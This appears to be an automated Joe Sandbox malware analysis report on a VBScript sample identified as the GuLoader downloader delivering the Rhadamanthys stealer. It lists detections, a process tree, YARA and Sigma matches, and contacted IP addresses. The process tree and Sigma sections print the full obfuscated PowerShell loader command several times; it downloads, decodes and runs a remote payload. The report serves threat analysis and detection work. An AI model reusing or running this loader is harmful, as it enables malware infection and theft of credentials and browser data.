Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
g8ix97hz.vbs

Overview

General Information

Sample name:g8ix97hz.vbs
Analysis ID:1577818
MD5:88d98bd2a112b408acaeb0b875592c7a
SHA1:c16e7b591755e996a4fafb382453c7c8cfafc966
SHA256:878054ff4e790a597a5c6f3b1f16bbda833eef9c09e4c4fe28d33da8ee1255e7
Tags:87-120-112-91vbsuser-JAMESWT_MHT
Infos:

Detection

GuLoader, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Dllhost Internet Connection
Sigma detected: Msiexec Initiated Connection
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3968 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\g8ix97hz.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WMIC.exe (PID: 5332 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De,mt Go arSp= u$UnAfds obMioAdl oialtane') ;cleavingly $Pastina;cleavingly (Symboltabeller 'BjS iTTaAsurFitT -StSE L EovE.oP,o Se4');cleavingly (Symboltabeller 'Go$NoGL lFlOPrb LAGalS : awBie Re .k IEkoN OdG U ,dKvfOvlSpUNoG.itTjePiRA NTyeD,smi=M,( ft.pe SsTrT - CpF.AKot hSp Fe$Mus TopeW,M ,N.kIV.NPlGV.SAlfPhu kLGrDCaT o)') ;cleavingly (Symboltabeller 'Sy$ Dg rL ao,mBB.aT Lst:deuT nChm .uArfSuF SlSne aSTr= i$ sgGlLSiO.abS,a Tl o: KaR LBeEUfTPaH MoPaP.rtIneU IEtsSk+Pe+No%Fl$G,V eA aU bExeKiNsafHuAUnbEkrB i nKSy.dycOvO uprN ,t') ;$Eliksirers=$Vaabenfabrik[$Unmuffles]}$Velfunderede=317450;$autoriserendes=28180;cleavingly (Symboltabeller ' w$PlGXyLAmO eBBlabol n:Mef nrFadZaiLsG MbMoY ogO gMieUdTB, Vi= U SegB,EbetCh-UoC uoVeNQuTB e,unF.t i Fi$P sAntAtEU MTen oiFoN SGSaSAffU,UMylInDNot');cleavingly (Symboltabeller 'Ud$opgSplCroPebHjaUdlMe: TE np HoWhc HhB.e N=Sy Vi[DeS,eyR sMatNee.mmFn.,pCRioInnRevReeSarP t ]Ca:Sn:K F arNao PmU B oa asRyeMi6B 4 aS BtIprRoi unAng D( a$.eF FrTid .i gPrb,yyAfgSug be Pt s)');cleavingly (Symboltabeller 'T.$ .g .lT.OInbEsaQul o: eFSpl KJ VL usBeGLrR,iS u D =Re D[ osHeYI sS TSkE mBa. yT.nED x Ct E. ae NReCReOEgdS I DN eG,e]H,:C.:R ATysB CNaislIQu.AdGP eB,TVesSaTElR ,I,enSygte( R$ WEHop moN.c .HDiEB )');cleavingly (Symboltabeller 'Fe$Hog .lUnO Fb ea FLOu:KoBKaARet rtC,aRaLCoineaFo=.b$ReFSulUnJ iL ksDeG ,RG S F. ps fuC.b ysAltKoR,iIP.nTyGLo(.o$ToVUneFuLdeFTaU SnG dHaESorAkEFaDFoERe, ,$Una lUigT o Vr eI Ps SEM RPeeBrn HdAse.rS,a)');cleavingly $Battalia;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7640 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 7756 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De,mt Go arSp= u$UnAfds obMioAdl oialtane') ;cleavingly $Pastina;cleavingly (Symboltabeller 'BjS iTTaAsurFitT -StSE L EovE.oP,o Se4');cleavingly (Symboltabeller 'Go$NoGL lFlOPrb LAGalS : awBie Re .k IEkoN OdG U ,dKvfOvlSpUNoG.itTjePiRA NTyeD,smi=M,( ft.pe SsTrT - CpF.AKot hSp Fe$Mus TopeW,M ,N.kIV.NPlGV.SAlfPhu kLGrDCaT o)') ;cleavingly (Symboltabeller 'Sy$ Dg rL ao,mBB.aT Lst:deuT nChm .uArfSuF SlSne aSTr= i$ sgGlLSiO.abS,a Tl o: KaR LBeEUfTPaH MoPaP.rtIneU IEtsSk+Pe+No%Fl$G,V eA aU bExeKiNsafHuAUnbEkrB i nKSy.dycOvO uprN ,t') ;$Eliksirers=$Vaabenfabrik[$Unmuffles]}$Velfunderede=317450;$autoriserendes=28180;cleavingly (Symboltabeller ' w$PlGXyLAmO eBBlabol n:Mef nrFadZaiLsG MbMoY ogO gMieUdTB, Vi= U SegB,EbetCh-UoC uoVeNQuTB e,unF.t i Fi$P sAntAtEU MTen oiFoN SGSaSAffU,UMylInDNot');cleavingly (Symboltabeller 'Ud$opgSplCroPebHjaUdlMe: TE np HoWhc HhB.e N=Sy Vi[DeS,eyR sMatNee.mmFn.,pCRioInnRevReeSarP t ]Ca:Sn:K F arNao PmU B oa asRyeMi6B 4 aS BtIprRoi unAng D( a$.eF FrTid .i gPrb,yyAfgSug be Pt s)');cleavingly (Symboltabeller 'T.$ .g .lT.OInbEsaQul o: eFSpl KJ VL usBeGLrR,iS u D =Re D[ osHeYI sS TSkE mBa. yT.nED x Ct E. ae NReCReOEgdS I DN eG,e]H,:C.:R ATysB CNaislIQu.AdGP eB,TVesSaTElR ,I,enSygte( R$ WEHop moN.c .HDiEB )');cleavingly (Symboltabeller 'Fe$Hog .lUnO Fb ea FLOu:KoBKaARet rtC,aRaLCoineaFo=.b$ReFSulUnJ iL ksDeG ,RG S F. ps fuC.b ysAltKoR,iIP.nTyGLo(.o$ToVUneFuLdeFTaU SnG dHaESorAkEFaDFoERe, ,$Una lUigT o Vr eI Ps SEM RPeeBrn HdAse.rS,a)');cleavingly $Battalia;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 4156 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • svchost.exe (PID: 3604 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • svchost.exe (PID: 3532 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • chrome.exe (PID: 3852 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr83C0.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a52e5cd8/20442955" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
            • chrome.exe (PID: 4140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2332,i,10028709547936440876,11237033712603791372,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • msedge.exe (PID: 4832 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr8AD6.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a52e5cd8/a1d56f56" MD5: BF154738460E4AB1D388970E1AB13FAB)
            • msedge.exe (PID: 2736 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2040,i,14070715780729818373,9332717717908022524,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
          • wmpshare.exe (PID: 7704 cmdline: "C:\Program Files\Windows Media Player\wmpshare.exe" MD5: A89F75B51EAADA8C97F8D674B3EDB2F2)
            • dllhost.exe (PID: 5020 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2587069409.0000000008A10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000013.00000003.2708452120.0000000024620000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000016.00000003.2712310012.0000000004F60000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000016.00000003.2709177603.0000000000B80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          00000013.00000003.2708661877.0000000024840000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            19.3.msiexec.exe.24620000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              22.3.svchost.exe.4f60000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                19.3.msiexec.exe.24840000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  19.3.msiexec.exe.24840000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    22.3.svchost.exe.4f60000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 4 entries

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi64_524.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi32_7756.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                        • 0xbd8e:$b2: ::FromBase64String(
                        • 0xae02:$s1: -join
                        • 0x45ae:$s4: +=
                        • 0x4670:$s4: +=
                        • 0x8897:$s4: +=
                        • 0xa9b4:$s4: +=
                        • 0xac9e:$s4: +=
                        • 0xade4:$s4: +=
                        • 0x14554:$s4: +=
                        • 0x145d4:$s4: +=
                        • 0x1469a:$s4: +=
                        • 0x1471a:$s4: +=
                        • 0x148f0:$s4: +=
                        • 0x14974:$s4: +=
                        • 0xb633:$e4: Get-WmiObject
                        • 0xb822:$e4: Get-Process
                        • 0xb87a:$e4: Start-Process
                        • 0x15220:$e4: Get-Process

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\g8ix97hz.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\g8ix97hz.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\g8ix97hz.vbs", ProcessId: 3968, ProcessName: wscript.exe
                        Sigma detected: Dllhost Internet Connection
                        Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 45.149.241.141, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 5020, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49975
                        Sigma detected: Msiexec Initiated Connection
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 202.71.109.228, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4156, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49837
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 4156, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 3604, ProcessName: svchost.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\g8ix97hz.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\g8ix97hz.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\g8ix97hz.vbs", ProcessId: 3968, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De,mt Go arSp= u$UnAfds obMioAdl oialtane') ;cleavingly $Pastina;cleavingly (Sy
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7640, ProcessName: svchost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
